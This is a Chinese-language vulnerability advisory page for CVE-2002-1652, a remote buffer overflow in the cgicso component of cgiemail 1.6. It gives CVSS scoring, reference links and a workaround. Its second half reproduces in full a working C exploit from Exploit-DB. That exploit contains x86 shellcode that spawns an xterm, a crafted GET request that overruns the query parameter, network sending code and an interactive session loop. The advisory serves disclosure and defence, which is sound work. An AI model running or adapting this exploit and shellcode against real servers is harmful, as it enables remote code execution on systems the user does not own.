CVE-2002-1652
CVSS7.5
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-10 15:15:11
NMCOE    

[原文]Buffer overflow in cgicso.c for cgiemail 1.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long query parameter.


[CNNVD]CGIEmail远程缓冲区溢出漏洞(CNNVD-200212-873)

        
        CGIEmail是一款基于WEB的邮件处理系统。
        CGIEmail中的cgicso.c程序对用户提交的查询内容缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,可以以WEB权限执行任意指令。
        cgicso.c程序对query参数的内容缺少充分检查,攻击者提交超长的字符串作为query参数内容,可触发缓冲区溢出,精心构建提交的字符传可能以WEB进程的权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1652
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1652
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-873
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/185251
(UNKNOWN)  CERT-VN  VU#185251
http://xforce.iss.net/xforce/xfdb/10595
(PATCH)  XF  cgiemail-cgicso-get-bo(10595)
http://www.securityfocus.com/bid/6141
(PATCH)  BID  6141
http://www.securiteam.com/exploits/5TP0W005FE.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5TP0W005FE.html
http://securitytracker.com/id?1002395
(UNKNOWN)  SECTRACK  1002395

- 漏洞信息

CGIEmail远程缓冲区溢出漏洞
高危 边界条件错误
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        CGIEmail是一款基于WEB的邮件处理系统。
        CGIEmail中的cgicso.c程序对用户提交的查询内容缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,可以以WEB权限执行任意指令。
        cgicso.c程序对query参数的内容缺少充分检查,攻击者提交超长的字符串作为query参数内容,可触发缓冲区溢出,精心构建提交的字符传可能以WEB进程的权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 关闭系统远程查询选项。
        厂商补丁:
        MIT
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://web.mit.edu/wwwdev/cgiemail/

- 漏洞信息 (21998)

CGIEmail 1.6 Remote Buffer Overflow Vulnerability (EDBID:21998)
linux remote
2001-09-11 Verified
0 isox
N/A [点击下载]
source: http://www.securityfocus.com/bid/6141/info

A vulnerability has been discovered in CGIEmail. It should be noted that this vulnerability exists only if the server allows queries to remote hosts.

A remotely exploitable buffer overflow has been discovered in a component included with CGIEmail. By sending a maliciously constructed GET request to the vulnerable server, it is possible for a remote attacker to overrun a buffer, potentially resulting in the execution of arbitrary system commands with the privileges of the mail server.

/*
 * cso.c (06/30/01)
 *
 * Remote exploit for cgicso included with cgiemail 1.6
 * Tested on Slackware Linux 7.1 running Apache 1.3.20
 * Spawns an xterm on your display.
 *
 *
 * Note: In order to exploit, cgicso must be compiled with
 * CGI_CSO_HARDCODE undefined, otherwise it will bypass
 * the exploitable portion of code.
 *
 *
 * Exploit By: isox of hhp. (isox@chainsawbeer.com)
 * Site: www.hhp-programming.net && 0xc0ffee.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define RET 0xbfffe208 // Slackware 7.1.0
#define LEN 2038
#define PORT 80

char noncode[] =
  "\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b"
  "\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88"
  "\x34\x32\x31\xd2\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d"
  "\x7e\x19\x89\x7e\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e"
  "\x36\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xac\xff\xff\xff"
  "/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K";

char code[] =
  "%eb%4f%5e%31%d2%88%56%14%88%56%18%88%56%21%b2%2b%31%c9%b1%9%80%3c"
  "%32%4b%74%5%42%e2%f7%eb%2b%88%34%32%31%d2%89%f3%89%76%36%8d%7e%15"
  "%89%7e%3a%8d%7e%19%89%7e%3e%8d%7e%22%89%7e%42%89%56%46%8d%4e%36%8d"
  "%56%46%31%c0%b0%b%cd%80%31%db%89%d8%40%cd%80%e8%ac%ff%ff%ff%2f%75"
  "%73%72%2f%58%31%31%52%36%2f%62%69%6e%2f%78%74%65%72%6d%38%2d%75%74"
  "%38%2d%64%69%73%70%6c%61%79%38"
  "%31%32%37%2e%30%2e%30%2e%31" // unicoded IP address
  "%3a%30%4b";



int main(int argc, char *argv[]) {
  char *buf, *p;
  long *addressp, address=RET;
  int i, diff=(strlen(code) - strlen(noncode)), sock, debug=0;
  struct hostent *t;
  struct sockaddr_in s;


  if(argc < 2) {
    fprintf(stderr, "usage: %s <host> [offset [--debug]]\n", argv[0]);
    exit(-1);
  }

  if(argc > 2)
    address -= atoi(argv[2]);

  if(argc > 3) {
    if((!strcmp(argv[3], "--debug")) || (!strcmp(argv[3], "-d")))
      debug = 1;
  }


  fprintf(stderr, "Using Address: 0x%lx\n", address);

  buf = (char *)malloc(44 + LEN + diff + 1);
  p = buf;


  (*p++) = 'G';
  (*p++) = 'E';
  (*p++) = 'T';
  (*p++) = ' ';
  (*p++) = '/';
  (*p++) = 'c';
  (*p++) = 'g';
  (*p++) = 'i';
  (*p++) = '-';
  (*p++) = 'b';
  (*p++) = 'i';
  (*p++) = 'n';
  (*p++) = '/';
  (*p++) = 'c';
  (*p++) = 'g';
  (*p++) = 'i';
  (*p++) = 'c';
  (*p++) = 's';
  (*p++) = 'o';
  (*p++) = '?';
  (*p++) = 'f';
  (*p++) = 'i';
  (*p++) = 'n';
  (*p++) = 'g';
  (*p++) = 'e';
  (*p++) = 'r';
  (*p++) = 'h';
  (*p++) = 'o';
  (*p++) = 's';
  (*p++) = 't';
  (*p++) = '=';
  (*p++) = 'A'; // Yes this should be an A
  (*p++) = '&';
  (*p++) = 'q';
  (*p++) = 'u';
  (*p++) = 'e';
  (*p++) = 'r';
  (*p++) = 'y';
  (*p++) = '=';
  (*p++) = 'A'; // Yes this should be an A
  (*p++) = 'A'; // Yes this should be an A
  (*p++) = 'A'; // Yes this should be an A

  for(i=0; i<strlen(code); i++)
    (*p++) = code[i];

  addressp = (long *)p;

  for(i=0; i<(LEN - strlen(code)) + diff; i+=4)
    (*addressp++) = address;


  strcat(buf, "\n\n");
  fprintf(stderr, "Using length: %d\n", strlen(buf));




/*
 * Connect
 */

  if(s.sin_addr.s_addr=inet_addr(argv[1])) {
    if(!(t=gethostbyname(argv[1]))) {
      printf("Connection Failed.\n");
      exit(-1);
    }

    memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
  }

  s.sin_family=AF_INET;
  s.sin_port=htons(PORT);

  sock=socket(AF_INET,SOCK_STREAM,0);


  if(connect(sock,(struct sockaddr*)&s,sizeof(s))) {
    fprintf(stderr, "Connection failed.\n");
    exit(-1);
  }

  fprintf(stderr, "done.\n");
  fprintf(stderr, "Sending buffer... ");
  send(sock, buf, strlen(buf), 0);
  fprintf(stderr, "done.\n");

  sleep(2);

  if(debug == 1) {
    fprintf(stderr, "Entering Debug Mode... \n");
    initstream(sock);
  }

  close(sock);
  free(buf);
  exit(0);
}



int initstream(int sock) {
  int n;
  char recvbuf[1024];
  fd_set rset;

  while (1) {
    FD_ZERO(&rset);
    FD_SET(sock,&rset);
    FD_SET(STDIN_FILENO,&rset);
    select(sock+1,&rset,NULL,NULL,NULL);

    if (FD_ISSET(sock,&rset)) {
      if((n=read(sock,recvbuf,1024)) <= 0) {
        printf("Connection closed by foreign host.\n");
        exit(0);
      }

      recvbuf[n]=0;
      printf("%s",recvbuf);
    }

    if (FD_ISSET(STDIN_FILENO,&rset)) {
      if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
        recvbuf[n]=0;
        write(sock,recvbuf,n);
      }
    }
  }

  return;
}
		

- 漏洞信息

11631
CGIEmail cgisco.c query Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-09-11 Unknow
2001-10-01 Unknow

- 解决方案

Products

MIT

cgiemail

1.6

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站